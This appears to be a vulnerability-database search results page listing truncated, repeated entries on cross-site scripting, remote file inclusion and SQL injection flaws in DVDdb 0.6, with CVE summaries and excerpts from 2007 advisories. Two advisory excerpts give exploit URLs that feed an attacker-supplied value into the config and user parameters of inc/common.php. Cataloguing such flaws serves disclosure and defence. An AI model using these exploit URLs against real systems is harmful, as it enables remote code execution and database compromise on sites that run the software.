16 matches found
EUVD-2007-2492
Malware in sbrugna...
Cross-site scripting
Multiple cross-site scripting (XSS) vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the movieid parameter to loan.php or (2) the s parameter to listmovies.php...
CVE-2007-2499
Multiple cross-site scripting (XSS) vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the movieid parameter to loan.php or (2) the s parameter to listmovies.php...
CVE-2007-2499
Multiple cross-site scripting (XSS) vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the movieid parameter to loan.php or (2) the s parameter to listmovies.php...
CVE-2007-2499
CVE-2007-2499 covers multiple XSS flaws in DVDdb 0.6 and earlier. The vulnerabilities allow remote attackers to inject arbitrary script/HTML through (1) the movieid parameter in loan.php and (2) the s parameter in listmovies.php. The NVD entry provides a base score of 6.8 (MEDIUM) with NETWORK at...
DVDdb XSS vuln.
DVDdb XSS vuln. Vuln. discovered by: r0t Date: 2 May 2007 vendor: http://globalmegacorp.org/dvddb/ affected versions: 0.6 and previous original advisory: http://pridels.blogspot.com/2007/05/dvddb-xss-vuln.html DVDdb contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to t...
Remote file inclusion
PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter...
SQL injection
SQL injection vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: this issue has been disputed by a reliable third party, who states that inc/common.php only contains function definitions...
CVE-2007-0793
PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter...
CVE-2007-0794
SQL injection vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: this issue has been disputed by a reliable third party, who states that inc/common.php only contains function definitions...
CVE-2007-0793
PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter...
CVE-2007-0794
CVE-2007-0794 describes a SQL injection vulnerability in GlobalMegaCorp dvddb 0.6, specifically in inc/common.php via the user parameter, potentially allowing remote arbitrary SQL execution. Some sources note the issue is disputed and that the file may contain only function definitions. Connected...
CVE-2007-0793
CVE-2007-0793 describes a PHP remote file inclusion vulnerability in inc/common.php of GlobalMegaCorp dvddb 0.6, allowing remote attackers to execute arbitrary PHP code via a URL supplied in the config parameter. The affected component is the dvddb app’s common.php handling of config paths; root ...
dvddb06-rfi.txt
Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...
dvddb-0.6 media remote file include vuln.
Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...
dvddb-0.6 media sql-inj. vuln.
Title : dvddb-0.6 media sql-inj. vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] ExpLoit : http://target/path/inc/common.php?user=sql GreetZ: BLaCKWHITE, HackerBox.Eu...